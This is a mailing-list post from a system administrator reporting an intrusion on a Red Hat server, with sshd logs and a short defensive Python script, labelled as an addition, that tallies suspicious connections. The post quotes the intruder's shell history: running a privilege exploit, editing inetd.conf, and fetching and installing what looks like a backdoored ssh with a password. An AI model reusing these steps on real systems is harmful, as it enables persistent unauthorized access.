Someone hacking into our system.
- From: Michael Hatchard <mhatch northside net au>
- To: "'redhat-list redhat com'" <redhat-list redhat com>
- Subject: Someone hacking into our system.
- Date: Sun, 2 Jan 2000 01:33:00 +1030
To All
Someone has hacked into our system.
I'm not quite sure how he is getting in.
But here is some info from my logs.
It looks like it starts here from my guess
machine admin (software testing machine)
Redhat 6.0
ssh 1.2.27-5i
Dec 31 01:25:31 admin sshd connect from 194.109.6.45 port 58440
Dec 31 01:25:40 admin sshd fatal: Did not receive ident string
Dec 31 01:26:45 admin sshd connect from 194.109.6.45 port 58445
Dec 31 01:26:45 admin sshd fatal: Local: This server does not support your new ssh version
Dec 31 01:26:46 admin sshd connect from 194.109.6.45 port 1009
Dec 31 01:26:58 admin sshd fatal: Connection closed by remote
Dec 31 01:26:58 admin PAM_pwdb 2 authentication failures; (uid=0) => mhatch for ssh service
Another 2 attempts at 01:30:03 and 01:30:04 at ports 58454 and 1009
Dec 31 01:30:06 admin sshd log: Unknown group id 530
Dec 31 01:30:07 admin PAM_pwdb get passwd; pwdb: structure is no longer valid
As line above at 01:30:17 and 01:30:21
Another connection at 01:44:02 then again at 05:50:23 05:50:27
Dec 31 05:50:49 admin sshd fatal: Could not load host key: /etc/ssh_host_key. Check path and permission's
In the tmp dir I found
.bash_history Dec 31 05:53 with
id
rm -rf /dev/...
w
exit
pico
cc -o uid uid.c
./uid
exit
./uid
ls
rm -rf rc
cd /usr/bin
ls -al |grep crontab
ls
cd /tmp
ls
pico /etc/inetd.conf
killall -9 inetd
/usr/bin/inetd
pico /etc/inetd.conf
killall -9 inetd
/usr/bin/inetd
ftp linux.tai.com.pl
gzip -d ssh*
tar -xvf ssh*
cd ssh*
./setup.sh m4c3r0x 1.2.27
./configure;make
ls
cd ..
rm -rf ssh*
ftp linux.tai.com.pl
ls
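Added example, not part of the original post: a Python script showing how a responder might tally the sshd and PAM lines quoted above per source address. Because the posted lines carry no PIDs, it attributes each fatal or PAM failure to the most recent connect within an assumed 60-second window; the function names, the year and the thresholds are illustrative assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Lines copied from the log excerpt in the post (format as posted, without PIDs).
SAMPLE_LOG = """\
Dec 31 01:25:31 admin sshd connect from 194.109.6.45 port 58440
Dec 31 01:25:40 admin sshd fatal: Did not receive ident string
Dec 31 01:26:45 admin sshd connect from 194.109.6.45 port 58445
Dec 31 01:26:45 admin sshd fatal: Local: This server does not support your new ssh version
Dec 31 01:26:46 admin sshd connect from 194.109.6.45 port 1009
Dec 31 01:26:58 admin sshd fatal: Connection closed by remote
Dec 31 01:26:58 admin PAM_pwdb 2 authentication failures; (uid=0) => mhatch for ssh service
"""

LINE = re.compile(r"^(\w{3} +\d+ \d\d:\d\d:\d\d) (\S+) (\S+) (.*)$")
CONNECT = re.compile(r"connect from (\S+) port (\d+)")
AUTH_FAIL = re.compile(r"(\d+) authentication failures?; .*=> (\S+) for (\S+) service")
WINDOW = timedelta(seconds=60)  # assumed correlation window

def parse(text, year=1999):
    """Yield (timestamp, program, message); syslog omits the year, so it is assumed."""
    for raw in text.splitlines():
        m = LINE.match(raw.strip())
        if m:
            ts = datetime.strptime(f"{year} {m.group(1)}", "%Y %b %d %H:%M:%S")
            yield ts, m.group(3), m.group(4)

def summarize(text):
    """Per source IP: connects, sshd fatals and PAM failures tied to the latest connect."""
    stats = defaultdict(lambda: {"connects": 0, "fatals": 0, "auth_failures": 0, "users": set()})
    last_ip, last_ts = None, None
    for ts, prog, msg in parse(text):
        c = CONNECT.search(msg)
        if prog == "sshd" and c:
            last_ip, last_ts = c.group(1), ts
            stats[last_ip]["connects"] += 1
        elif last_ip is not None and ts - last_ts <= WINDOW:
            a = AUTH_FAIL.search(msg)
            if prog == "sshd" and msg.startswith("fatal:"):
                stats[last_ip]["fatals"] += 1
            elif prog.startswith("PAM") and a:
                stats[last_ip]["auth_failures"] += int(a.group(1))
                stats[last_ip]["users"].add(a.group(2))
    return dict(stats)

def suspicious(stats, min_fatals=2):
    """Sources with repeated aborted sessions plus at least one failed login (assumed rule)."""
    return sorted(ip for ip, s in stats.items() if s["fatals"] >= min_fatals and s["auth_failures"] > 0)

if __name__ == "__main__": print(suspicious(summarize(SAMPLE_LOG)))
```

On a live host the same tally is more reliable when keyed on the sshd PID that a full syslog line carries, rather than on time proximity.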